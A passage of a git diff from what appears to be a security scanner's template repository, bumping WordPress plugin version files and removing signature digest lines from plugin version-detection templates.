http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/hostinger.yaml | 1 - http/technologies/wordpress/plugins/image-optimization.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 3 +-- http/technologies/wordpress/plugins/metform.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - .../technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 - http/technologies/wordpress/plugins/sg-security.yaml | 1 - http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - .../technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 210 files changed, 12 insertions(+), 212 deletions(-) diff --git a/helpers/wordpress/plugins/chaty.txt b/helpers/wordpress/plugins/chaty.txt index 34cde5690e..c4a602db6e 100644 --- a/helpers/wordpress/plugins/chaty.txt +++ b/helpers/wordpress/plugins/chaty.txt @@ -1 +1 @@ -3.2.6 +3.2.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/contact-form-7-honeypot.txt b/helpers/wordpress/plugins/contact-form-7-honeypot.txt index f577dfda01..abae0d9a94 100644 --- a/helpers/wordpress/plugins/contact-form-7-honeypot.txt +++ b/helpers/wordpress/plugins/contact-form-7-honeypot.txt @@ -1 +1 @@ -trunk \ No newline at end of file +2.1.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ga-google-analytics.txt b/helpers/wordpress/plugins/ga-google-analytics.txt index 6b0b4b963d..d32d6bf20e 100644 --- a/helpers/wordpress/plugins/ga-google-analytics.txt +++ b/helpers/wordpress/plugins/ga-google-analytics.txt @@ -1 +1 @@ -20240308 \ No newline at end of file +20240701 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-site-kit.txt b/helpers/wordpress/plugins/google-site-kit.txt index a9fa640623..025b749b3a 100644 --- a/helpers/wordpress/plugins/google-site-kit.txt +++ b/helpers/wordpress/plugins/google-site-kit.txt @@ -1 +1 @@ -1.129.1 \ No newline at end of file +1.130.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/kadence-blocks.txt b/helpers/wordpress/plugins/kadence-blocks.txt index 494bf99a9c..a8b473393b 100644 --- a/helpers/wordpress/plugins/kadence-blocks.txt +++ b/helpers/wordpress/plugins/kadence-blocks.txt @@ -1 +1 @@ -3.2.47 \ No newline at end of file +3.2.48 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ninja-forms.txt b/helpers/wordpress/plugins/ninja-forms.txt index 8a8c005df7..8c1da59dbb 100644 --- a/helpers/wordpress/plugins/ninja-forms.txt +++ b/helpers/wordpress/plugins/ninja-forms.txt @@ -1 +1 @@ -3.8.4 \ No newline at end of file +3.8.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/optinmonster.txt b/helpers/wordpress/plugins/optinmonster.txt index 90c94814ed..38275d2df8 100644 --- a/helpers/wordpress/plugins/optinmonster.txt +++ b/helpers/wordpress/plugins/optinmonster.txt @@ -1 +1 @@ -2.16.2 \ No newline at end of file +2.16.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/post-smtp.txt b/helpers/wordpress/plugins/post-smtp.txt index daf077f9e0..4f1a964f8e 100644 --- a/helpers/wordpress/plugins/post-smtp.txt +++ b/helpers/wordpress/plugins/post-smtp.txt @@ -1 +1 @@ -2.9.6 \ No newline at end of file +2.9.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt index 6533b66871..96d771776b 100644 --- a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt @@ -1 +1 @@ -2.8.0 \ No newline at end of file +2.8.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpvivid-backuprestore.txt b/helpers/wordpress/plugins/wpvivid-backuprestore.txt index df9d20d6e7..f4f34f43ea 100644 --- a/helpers/wordpress/plugins/wpvivid-backuprestore.txt +++ b/helpers/wordpress/plugins/wpvivid-backuprestore.txt @@ -1 +1 @@ -0.9.102 \ No newline at end of file +0.9.103 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 2b06578e27..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200857d8b76b2c77992248c3bf572659c3bf4e9798223fffbf1fe57d12a430c8a6022009f125d6d84762cbee235c12586cf55687cf386e78d49b006159ab41f2531a70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 176d4fa6f7..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210098c0583776bf21f845477770151d4fcccc91de97b76dedf7c9e63e5b71e42f10022100fa7622ddd63f625108a0acc00f803b4a845fe80db65bf8bdcfa89c57500483ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 024c61a679..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203b7c4f8970aef686fe0b8cb3de3be7f301c38271ea82d2d7ad1366593c8d9fbe0221008cf9df7cdc9ca95525fc7f7eb22f52d07cb60d48ec14a37308679be35294f11f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 392ed6d11a..cddbb4bb2e 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022061b3dded40f5ba100e4122f783a43d469c8a32f126a032b30a20f301f0c7291e022029f8af9dc2d8ae058710e5e7f0f7c206c83196152cca423218fb863dde71cd67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 0070c971bf..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008b475108addc0119fc7f09dd8a848269928d94e1bf227bdd9dea30341840cf7802203c2a0fd0b58f0c95244a0928b2345f913f02db2a06e6d30ef9ae12ed59455ba9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 55b77c0397..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100844139e9155d2fe45c92206c4ff572793e656b647ddeb486cbe96384baec8c890220488de7c36352d9624bf231939019a950e0ff1b577cac9e0e320e772d29ab7ae0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index b40bfa5dab..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ed7a84338113c11ebd16e732baa3fb228732d97adf6071f64a0b084e962b560e022100e042baa63a0e3b8c52bbf2d26b453c677fdb559b39a89bcdb468887279a0e48a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 5d8c489449..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a9f61bd827d31772a4e8877ec718a30d6cb168eda2a70e227d79f9534874d3480220329a01faa56e85d77cedd0a3fba33a323c47e0ea49fc91e4503cb1018021eff4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index d8ea047887..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202bb73401f79841ec144414192382de1dae87ef36f76b8dce65580c5d4911e37b022100c613a5707ff57a0b4371086f493511c64d5d7fd7af4597f50f19adffa2afce38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index a6a072cad6..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022055f9c9242ed8ea63a4b13a76f8ffff8c03e1cd0a299c70c3719ba1b46148a0e7022066b4ffb4e4f4a31c0c2b7637f2f73ef97a3cefd86cea2991e7f3c75a053bb574:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index cdb9c4291c..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203ce3dbbf5ddb8c033fa4faa86a7b009c69479eb90747e6677af6be539afc84730220120f3aa577e5d087e2ff2c7131510432795b3234da9416e432c728e0b78bdf73:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 5465f8c403..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204bbc9717e02a0fb1f349efe96ad1fb18a337ecaa5a2ece7ab7f0980c3e7381b3022100a0483d3d42a29504bb0c5bee74b987b759aae2a96cc3d4f8e6277bd5cc2b4efb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 6cd942afda..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fcb905788449f283a34ec5bce91e4b883b27b995baec380c0020fba04e05434202202973baa3351e5706d82187475ef479d6399cff597f0365717d15f41e736872db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index a604c79f51..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c56d79d2859bffb06ca215005aabe0d576278a44de3737c09361227aec2e8e13022100c937807e1213a3ee6c3ec862ecb436e042d95080869de7be4c9e5a201515a3c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 1a158946fa..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202f49e8ed4f7fe6d0e7528e3461ed9a348379d270fa6c04ff82197aea47ed264702210084f93fa9c6e22594d20ebaea92d8f3b6332efc06ff9b79a688b83e83c9ee49c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index f584f360de..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e25cf3e9a7534c09ab979ec41cfd1d7be980deee679efc15978d4b96da2810e3022100956bf41456e8201f19307df6dbc3aeee3073cb0bd77f892958abeb6e929aebc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 93567fe139..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022058d26347b8df4dd691789f4a9144959718633b4ee4ed33e4c248bee0fc0b96bd0220424b410ef66eb4f52ff1589604cdb1792a2aa035f1748bc04a17623a220edc24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 92eea7f85e..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202f0a893d20ad887af064ae773d019520dd7559fb14ace584a2b6d3befe3ca3ce02202c6295081fd9fd8abd7f2c21c8b7bf45c661a26dd9b5275a15134f965ab5a0bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index fd08363c19..4e3c68c53a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker - tags: tech,wordpress,wp-plugin,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 http: - method: GET @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220024bd34c32448960ab7c97549f611876c48fad3daa902df5273596db781535f4022100a53b6f59a74cfde552bb70bf5e50c311a7c5c21a8614f1d328e99e2b7468a85c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index f4799118da..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205d574e34d462d5e46cfcaab0b4942233cd743cff0f91e181996828cb12707e5c02202117be10e55c830d652ae8b2411219e8950317aa7fe8b38a5554c673850fe6a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 53c029f784..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100e280439b3dd1f38f74fc5fff5fc794da95682da1de6fe0501920c5f25d33f7d8022038a0bd0ac41515ebd920bdc39d8ec45060f24da0657e2982bb5b153f4863542d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index aef15aebd7..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100afb129792c0874ddf8ec6f21286105f6e1465eb166135a29da13ca1316ca89a00220429328c2ec2b306edb5f6368b3b277a33c0fd5b427c7dec5b7e5151d4de1283e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index b922eb0777..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ce1dff87e6fc363546ac94146da71a520d175174d1680b9cd376f4a2b6525b5e022100a113d8aabaa679c275bd7d272a32d3c07888ae2b7c8605cdaac85823cbf99ba8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index e54c4d0f85..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a0f080c0cf2613ebadb232a0029848c14f59fddb3c9c26fb1ea891f58906fba102201268ec9a06fdbbdda60d5cdae606edbe24814880d5ff44f6bf0d2a662e74dd1c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c32628d9eb..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 